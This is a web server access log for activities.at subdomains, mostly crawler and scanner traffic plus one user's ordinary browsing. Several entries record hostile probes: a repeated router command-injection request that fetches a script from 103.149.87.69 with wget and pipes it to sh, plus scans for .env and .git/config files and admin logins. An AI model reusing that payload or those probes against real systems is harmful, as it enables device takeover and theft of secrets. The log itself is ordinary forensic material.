156.59.198.136 - - [03/Dec/2024:01:02:58 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911111503_RenOrder.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Dec/2024:01:06:58 +0100] "GET /ed-test.activities.at/stats/lang/awstats-nl.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [03/Dec/2024:01:11:17 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/30.0.1599.12 Mobile/11A465 Safari/8536.25 (3B92C18B-D9DE-4CB7-A02A-22FD2AF17C8F)"
194.50.16.198 - - [03/Dec/2024:01:12:49 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
107.189.2.39 - - [03/Dec/2024:01:43:29 +0100] "GET /wp-login.php HTTP/1.1" 404 289 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
59.126.254.42 - - [03/Dec/2024:01:54:55 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
159.223.80.172 - - [03/Dec/2024:01:55:32 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
159.223.80.172 - - [03/Dec/2024:01:55:33 +0100] "GET /activities.ico%22%20type=%22image/ico HTTP/1.1" 404 305 "-" "Go-http-client/1.1"
156.59.198.136 - - [03/Dec/2024:01:56:37 +0100] "GET /ed-test.activities.at/stats/lang/awstats-sk.txt HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Dec/2024:02:06:26 +0100] "GET /ed-test.activities.at/stats/lang/awstats-tr.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Dec/2024:02:10:27 +0100] "GET /ed-test.activities.at/stats/lang/awstats-ru.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Dec/2024:02:14:27 +0100] "GET /ed-test.activities.at/stats/lang/awstats-jp.txt HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.88 - - [03/Dec/2024:02:16:53 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [03/Dec/2024:02:18:27 +0100] "GET /renault.2web.at/htdocs/binaries/10188912.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Dec/2024:02:22:28 +0100] "GET /renault.2web.at/htdocs/binaries/10462863.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.163.250 - - [03/Dec/2024:02:41:22 +0100] "\x16\x03\x01" 400 383 "-" "-"
179.43.163.250 - - [03/Dec/2024:02:41:22 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
179.43.163.250 - - [03/Dec/2024:02:41:22 +0100] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [03/Dec/2024:02:41:22 +0100] "GET /.env.local HTTP/1.1" 404 284 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:02:41:22 +0100] "GET /.env.production HTTP/1.1" 404 287 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:02:41:23 +0100] "GET /app/.git/config HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:02:41:23 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:02:41:23 +0100] "GET /.env.preprod HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:02:41:23 +0100] "GET /config/.env HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:02:41:24 +0100] "GET /.env.docker HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:02:41:24 +0100] "GET /project/.git/config HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
179.43.163.250 - - [03/Dec/2024:02:41:25 +0100] "GET /prod/.env HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
205.210.31.180 - - [03/Dec/2024:02:43:24 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.135 - - [03/Dec/2024:02:53:32 +0100] "GET /renault.2web.at/htdocs/binaries/10485654.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Dec/2024:02:57:32 +0100] "GET /renault.activities.at/htdocs/binaries/10047536.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
16.170.218.123 - - [03/Dec/2024:03:09:49 +0100] "GET /wp-aa.php HTTP/1.1" 404 297 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
156.59.198.135 - - [03/Dec/2024:03:11:28 +0100] "GET /renault.2web.at/htdocs/binaries/10004287.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Dec/2024:03:15:28 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202007091703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
59.126.100.227 - - [03/Dec/2024:03:27:37 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
31.220.1.88 - - [03/Dec/2024:03:30:35 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
64.62.197.70 - - [03/Dec/2024:03:39:09 +0100] "\x16\x03\x01" 400 383 "-" "-"
5.8.11.202 - - [03/Dec/2024:03:45:26 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.136 - - [03/Dec/2024:03:49:25 +0100] "GET /renault.2web.at/htdocs/binaries/10008643.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
71.6.134.230 - - [03/Dec/2024:03:55:51 +0100] "\x16\x03\x01" 400 383 "-" "-"
194.50.16.198 - - [03/Dec/2024:03:58:00 +0100] "GET / HTTP/1.1" 200 423 "-" "Linux Gnu (cow)"
141.98.11.35 - - [03/Dec/2024:04:04:53 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
51.15.184.67 - - [03/Dec/2024:04:11:03 +0100] "POST /ss.php HTTP/1.1" 404 295 "-" "python-requests/2.27.1"
71.6.134.230 - - [03/Dec/2024:04:12:20 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
80.82.77.202 - - [03/Dec/2024:04:13:40 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
71.6.134.230 - - [03/Dec/2024:04:14:10 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
156.59.198.135 - - [03/Dec/2024:04:15:18 +0100] "GET /renault.2web.at/htdocs/binaries/10118689.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.112.106 - - [03/Dec/2024:04:29:53 +0100] "GET /.env HTTP/1.1" 404 280 "-" "W3C_Validator/1.654"
31.220.1.88 - - [03/Dec/2024:04:31:00 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
45.140.17.52 - - [03/Dec/2024:04:38:27 +0100] "\x03" 400 383 "-" "-"
46.19.138.234 - - [03/Dec/2024:04:43:18 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [03/Dec/2024:04:44:04 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image024.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Dec/2024:04:48:04 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image073.jpg HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Dec/2024:04:52:05 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909051603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
57.129.59.152 - - [03/Dec/2024:04:53:01 +0100] "GET /index.php HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/index.php" "Mozilla/5.0 (Windows NT 15.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Chrome/124.0.6367.60 Not-A.Brand/99 Safari/537.36"
79.7.186.51 - - [03/Dec/2024:04:54:10 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
156.59.198.136 - - [03/Dec/2024:04:56:05 +0100] "GET /ed-test.activities.at/stats/lang/awstats-en.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
59.127.188.139 - - [03/Dec/2024:04:58:35 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
194.50.16.198 - - [03/Dec/2024:05:06:50 +0100] "GET /cgi-bin/index.cgi HTTP/1.1" 404 362 "-" "-"
156.59.198.136 - - [03/Dec/2024:05:12:07 +0100] "GET /ed-test.activities.at/stats/lang/awstats-de.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [03/Dec/2024:05:15:32 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
179.43.133.122 - - [03/Dec/2024:05:16:16 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.205 - - [03/Dec/2024:05:29:45 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
31.220.1.88 - - [03/Dec/2024:05:41:12 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [03/Dec/2024:05:46:24 +0100] "GET /renault.2web.at/htdocs/binaries/10665041.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Dec/2024:05:50:23 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103170903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Dec/2024:05:55:29 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002071303_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Dec/2024:05:59:29 +0100] "GET /ed-test.activities.at/stats/lang/awstats-cy.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Dec/2024:06:03:30 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image123.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
20.118.68.216 - - [03/Dec/2024:06:05:01 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [03/Dec/2024:06:07:31 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/gray8b_bk.png HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Dec/2024:06:11:31 +0100] "GET /renault.2web.at/htdocs/binaries/10688680.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Dec/2024:06:23:33 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911221403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
192.241.155.120 - - [03/Dec/2024:06:26:47 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
194.50.16.198 - - [03/Dec/2024:06:30:30 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 363 "-" "-"
31.220.1.88 - - [03/Dec/2024:06:42:10 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
95.214.53.205 - - [03/Dec/2024:06:50:35 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.148.10.86 - - [03/Dec/2024:06:56:14 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
184.107.122.21 - - [03/Dec/2024:06:58:38 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
156.59.198.135 - - [03/Dec/2024:07:06:35 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008271003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.51.118 - - [03/Dec/2024:07:10:36 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.32.111 - - [03/Dec/2024:07:14:36 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
91.238.181.32 - - [03/Dec/2024:07:17:07 +0100] "\x03" 400 383 "-" "-"
54.176.44.5 - - [03/Dec/2024:07:19:23 +0100] "\x16\x03\x01" 400 383 "-" "-"
54.176.44.5 - - [03/Dec/2024:07:19:24 +0100] "\x16\x03\x01" 400 383 "-" "-"
54.176.44.5 - - [03/Dec/2024:07:19:24 +0100] "GET /.git2/config HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
80.82.77.202 - - [03/Dec/2024:07:38:15 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; LG-P870/P87020d Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [03/Dec/2024:07:45:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101111403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Dec/2024:07:49:12 +0100] "GET /ed-test.activities.at/stats/lang/awstats-pl.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
103.156.90.212 - - [03/Dec/2024:07:51:11 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
103.156.90.212 - - [03/Dec/2024:07:51:12 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
156.59.198.136 - - [03/Dec/2024:07:54:12 +0100] "GET /ed-test.activities.at/stats/lang/awstats-nb.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Dec/2024:07:58:12 +0100] "GET /ed-test.activities.at/stats/lang/awstats-al.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Dec/2024:08:06:30 +0100] "GET /renault.2web.at/htdocs/binaries/10269839.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
147.185.133.254 - - [03/Dec/2024:08:06:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [03/Dec/2024:08:10:30 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009281203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.10.139.222 - - [03/Dec/2024:08:17:17 +0100] "" 400 383 "-" "-"
45.148.10.86 - - [03/Dec/2024:08:44:57 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
156.59.198.136 - - [03/Dec/2024:08:45:10 +0100] "GET /renault.2web.at/htdocs/binaries/10462869.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.43 - - [03/Dec/2024:08:51:49 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.140.17.52 - - [03/Dec/2024:08:54:56 +0100] "\x03" 400 383 "-" "-"
178.115.42.220 - - [03/Dec/2024:09:05:03 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:04 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:04 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:04 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:04 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:04 +0100] "GET /gui/javascript/form_form.js?1733213104 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:04 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2419 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:04 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 935 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:05 +0100] "GET /gui/javascript/form_form.js?1733213105 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:05 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:05 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:05 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:05:08 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1966 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:06:12 +0100] "GET /gui/javascript/form_form.js?1733213172 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:06:12 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:06:12 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2012 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
